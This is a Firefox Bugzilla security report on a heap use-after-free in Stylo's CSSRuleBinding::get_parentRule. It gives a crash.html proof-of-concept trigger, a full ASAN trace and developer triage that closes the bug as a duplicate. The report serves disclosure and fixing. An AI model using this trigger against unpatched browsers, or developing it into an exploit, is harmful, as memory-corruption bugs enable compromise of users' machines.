Closed
Bug 1415901
Opened 7 years ago
Closed 7 years ago
stylo: heap-use-after-free in mozilla::dom::CSSRuleBinding::get_parentRule
Categories
(Core :: DOM: CSS Object Model, defect, P2)
Tracking
()
RESOLVED
DUPLICATE
of bug 1412145
People
(Reporter: nils, Unassigned)
References
Details
(Keywords: csectype-uaf, sec-high, Whiteboard: [adv-main58-])
Attachments
(2 files)
The following testcase crashes the latest ASAN build of Firefox nightly (SourceStamp=e2f87726b6082db0ae8a0866f65bff6b7062a07c). It requires the fuzzPriv extension.
crash.html:
<script>
function spin () {
var x=new XMLHttpRequest();
x.open("POST","https://mozilla.org",false);
try{x.send("X");}catch(e){}
}
function start() {
o108=document.createElement('style');
o108.textContent="@keyframes key9{ from {";
document.documentElement.appendChild(o108);
o124=document.styleSheets;
o125=o124[0];
o207=o125.cssRules;
try{document.documentElement.before(undefined,o108);}catch(e){}
o382=o207.item(0);
o437=o382.cssRules;
o382=o207=o125=o124=null;
fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();;
spin();
o1438=o437[0];
o1438.parentRule;
}
</script>
<body onload="start()"></body>
ASAN output:
=================================================================
==29853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000267ad8 at pc 0x7fafcf1e0afb bp 0x7fff4b0f5900 sp 0x7fff4b0f58f8
READ of size 4 at 0x60c000267ad8 thread T0 (file:// Content)
#0 0x7fafcf1e0afa in HasWrapperFlag /builds/worker/workspace/build/src/obj-firefox/dist/include/nsWrapperCache.h:369:15
#1 0x7fafcf1e0afa in IsDOMBinding /builds/worker/workspace/build/src/obj-firefox/dist/include/nsWrapperCache.h:202
#2 0x7fafcf1e0afa in CouldBeDOMBinding /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/BindingUtils.h:902
#3 0x7fafcf1e0afa in DoGetOrCreateDOMReflector<mozilla::css::Rule, mozilla::dom::binding_detail::GetOrCreateReflectorWrapBehavior::eWrapIntoContextCompartment> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/BindingUtils.h:1093
#4 0x7fafcf1e0afa in GetOrCreateDOMReflector<mozilla::css::Rule> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/BindingUtils.h:1177
#5 0x7fafcf1e0afa in mozilla::dom::CSSRuleBinding::get_parentRule(JSContext*, JS::Handle<JSObject*>, mozilla::css::Rule*, JSJitGetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSSRuleBinding.cpp:116
#6 0x7fafcfedce46 in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2909:13
#7 0x7fafd62ee760 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#8 0x7fafd62ee760 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472
#9 0x7fafd62f0735 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#10 0x7fafd62f0735 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
#11 0x7fafd62f0735 in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:655
#12 0x7fafd7282a5c in CallGetter /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2117:16
#13 0x7fafd7282a5c in GetExistingProperty<js::AllowGC::CanGC> /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2170
#14 0x7fafd7282a5c in NativeGetPropertyInline<js::AllowGC::CanGC> /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2373
#15 0x7fafd7282a5c in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2409
#16 0x7fafd62f91c8 in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1607:12
#17 0x7fafd62f91c8 in GetProperty /builds/worker/workspace/build/src/js/src/jsobj.h:805
#18 0x7fafd62f91c8 in js::GetProperty(JSContext*, JS::Handle<JS::Value>, JS::Handle<js::PropertyName*>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4379
#19 0x7fafd62dc430 in GetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:218:12
#20 0x7fafd62dc430 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2780
#21 0x7fafd62c1bca in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:12
#22 0x7fafd62ee85f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:494:15
#23 0x7fafd62ef752 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540:10
#24 0x7fafd6d39a8b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3032:12
#25 0x7fafcf8faa75 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
#26 0x7fafd030078d in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
#27 0x7fafd030078d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
#28 0x7fafd02c8816 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118:51
#29 0x7fafd02ca9e2 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
#30 0x7fafd02aa4f1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
#31 0x7fafd02ad9c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
#32 0x7fafd259106e in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
#33 0x7fafd5630b6a in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7765:21
#34 0x7fafd562cb94 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7563:7
#35 0x7fafd56343ef in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7460:13
#36 0x7fafcd1a0a73 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1321:3
#37 0x7fafcd19fbdc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:862:14
#38 0x7fafcd19cc68 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:751:9
#39 0x7fafcd19eb82 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:633:5
#40 0x7fafcd19f7dc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:489:14
#41 0x7fafcb713d40 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
#42 0x7fafce37f47d in nsDocument::DoUnblockOnload() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9402:18
#43 0x7fafce37f041 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9324:9
#44 0x7fafce359049 in nsDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5689:3
#45 0x7fafce3d3232 in applyImpl<nsDocument, void (nsDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1142:12
#46 0x7fafce3d3232 in apply<nsDocument, void (nsDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1148
#47 0x7fafce3d3232 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, (mozilla::RunnableKind)0>::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1192
#48 0x7fafcb5466f1 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
#49 0x7fafcb56b726 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
#50 0x7fafcb585be8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
#51 0x7fafcc348ed1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#52 0x7fafcc2a94db in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#53 0x7fafcc2a94db in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#54 0x7fafcc2a94db in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#55 0x7fafd1d2a5af in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:159:27
#56 0x7fafd60441b7 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
#57 0x7fafcc2a94db in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#58 0x7fafcc2a94db in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#59 0x7fafcc2a94db in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#60 0x7fafd6043b6a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
#61 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
#62 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
#63 0x7fafe8d0282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#64 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8)
0x60c000267ad8 is located 24 bytes inside of 120-byte region [0x60c000267ac0,0x60c000267b38)
freed by thread T0 (file:// Content) here:
#0 0x4bc0fb in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
#1 0x7fafcb406f07 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2729:25
#2 0x7fafcb4115e4 in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2917:3
#3 0x7fafcb4115e4 in nsCycleCollector_doDeferredDeletion() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4293
#4 0x7fafccd59bf3 in AsyncFreeSnowWhite::Run() /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:124:34
#5 0x7fafcb58ccef in IdleRunnableWrapper::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:339:22
#6 0x7fafcb56b726 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
#7 0x7fafcb585be8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
#8 0x7fafd1b6d6e7 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3080:31)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:323:25
#9 0x7fafd1b6d6e7 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3080
#10 0x7fafd1b6ef0c in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable<mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2909:11
#11 0x7fafcf71bb7b in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1249:9
#12 0x7fafcfedf260 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3040:13
#13 0x7fafd62ee760 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#14 0x7fafd62ee760 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472
#15 0x7fafd62d9feb in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:527:12
#16 0x7fafd62d9feb in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3061
#17 0x7fafd62c1bca in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:12
#18 0x7fafd62ee85f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:494:15
#19 0x7fafd62ef752 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540:10
#20 0x7fafd6d39a8b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3032:12
#21 0x7fafcf8faa75 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
#22 0x7fafd030078d in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
#23 0x7fafd030078d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
#24 0x7fafd02c8816 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118:51
#25 0x7fafd02ca9e2 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
#26 0x7fafd02aa4f1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
#27 0x7fafd02ad9c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
#28 0x7fafd259106e in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
#29 0x7fafd5630b6a in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7765:21
#30 0x7fafd562cb94 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7563:7
#31 0x7fafd56343ef in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7460:13
#32 0x7fafcd1a0a73 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1321:3
#33 0x7fafcd19fbdc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:862:14
#34 0x7fafcd19cc68 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:751:9
previously allocated by thread T0 (file:// Content) here:
#0 0x4bc44c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
#1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
#2 0x7fafd21097ae in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
#3 0x7fafd21097ae in mozilla::ServoCSSRuleList::GetRule(unsigned int) /builds/worker/workspace/build/src/layout/style/ServoCSSRuleList.cpp:105
#4 0x7fafcf1e0fda in Item /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/CSSRuleList.h:53:12
#5 0x7fafcf1e0fda in mozilla::dom::CSSRuleListBinding::item(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CSSRuleList*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSSRuleListBinding.cpp:58
#6 0x7fafcfedf260 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3040:13
#7 0x7fafd62ee760 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#8 0x7fafd62ee760 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472
#9 0x7fafd62d9feb in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:527:12
#10 0x7fafd62d9feb in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3061
#11 0x7fafd62c1bca in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:12
#12 0x7fafd62ee85f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:494:15
#13 0x7fafd62ef752 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540:10
#14 0x7fafd6d39a8b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3032:12
#15 0x7fafcf8faa75 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
#16 0x7fafd030078d in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
#17 0x7fafd030078d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
#18 0x7fafd02c8816 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118:51
#19 0x7fafd02ca9e2 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
#20 0x7fafd02aa4f1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
#21 0x7fafd02ad9c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
#22 0x7fafd259106e in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
#23 0x7fafd5630b6a in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7765:21
#24 0x7fafd562cb94 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7563:7
#25 0x7fafd56343ef in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7460:13
#26 0x7fafcd1a0a73 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1321:3
#27 0x7fafcd19fbdc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:862:14
#28 0x7fafcd19cc68 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:751:9
#29 0x7fafcd19eb82 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:633:5
#30 0x7fafcd19f7dc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:489:14
#31 0x7fafcb713d40 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
#32 0x7fafce37f47d in nsDocument::DoUnblockOnload() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9402:18
#33 0x7fafce37f041 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9324:9
#34 0x7fafce359049 in nsDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5689:3
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/nsWrapperCache.h:369:15 in HasWrapperFlag
Shadow bytes around the buggy address:
0x0c1880044f00: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c1880044f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1880044f20: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c1880044f30: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c1880044f40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c1880044f50: fa fa fa fa fa fa fa fa fd fd fd[fd]fd fd fd fd
0x0c1880044f60: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
0x0c1880044f70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c1880044f80: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c1880044f90: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x0c1880044fa0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==29853==ABORTING
|
||
Updated•7 years ago
|
Keywords: csectype-uaf,
sec-high
|
||
Comment 2•7 years ago
|
||
Only reproduces with Stylo enabled. Bisection goes all the way back to when we started building it by default.
Group: core-security → layout-core-security
Severity: normal → critical
Has Regression Range: --- → no
status-firefox56:
--- → disabled
status-firefox57:
--- → affected
status-firefox-esr52:
--- → unaffected
tracking-firefox57:
--- → ?
tracking-firefox58:
--- → ?
Priority: -- → P2
Summary: heap-use-after-free in mozilla::dom::CSSRuleBinding::get_parentRule → stylo: heap-use-after-free in mozilla::dom::CSSRuleBinding::get_parentRule
|
||
Updated•7 years ago
|
Flags: needinfo?(emilio)
|
||
Updated•7 years ago
|
Flags: needinfo?(xidorn+moz)
|
|
||
Comment 4•7 years ago
|
||
Yeah, I know this was familiar... But it was late yesterday. Xidorn can maybe confirm :)
Flags: needinfo?(emilio)
|
||
Comment 5•7 years ago
|
||
Too late for 57.
|
|
||
Comment 7•7 years ago
|
||
So, I had a look at the testcase, and it seems that this is indeed something that bug 1412145 should fix. This is exploiting via keyframes rule's css rule list. The patch in that bug includes a fix to the related code.
Flags: needinfo?(xidorn+moz)
|
||
Comment 8•7 years ago
|
||
Needinfo'ing myself to test whether there's a way to reproduce in Nightly.
Flags: needinfo?(fbraun)
|
|
||
Updated•7 years ago
|
Flags: needinfo?(fbraun)
|
|
||
Comment 9•7 years ago
|
||
Doesn't reproduce indeed. Thanks to truber for helping with verification. Dan, can we close this one?
Flags: needinfo?(dveditz)
|
|
||
Updated•7 years ago
|
Status: NEW → RESOLVED
Closed: 7 years ago
Flags: needinfo?(dveditz)
Resolution: --- → DUPLICATE
|
|
||
Comment 11•7 years ago
|
||
Updating 58 status from 1412145.
|
||
Updated•6 years ago
|
Whiteboard: [adv-main58-]
|
|
||
Updated•6 years ago
|
Flags: sec-bounty?
|
|
||
Updated•6 years ago
|
Flags: sec-bounty? → sec-bounty-
|
|
||
Updated•6 years ago
|
Group: layout-core-security
You need to log in
before you can comment on or make changes to this bug.
Description
•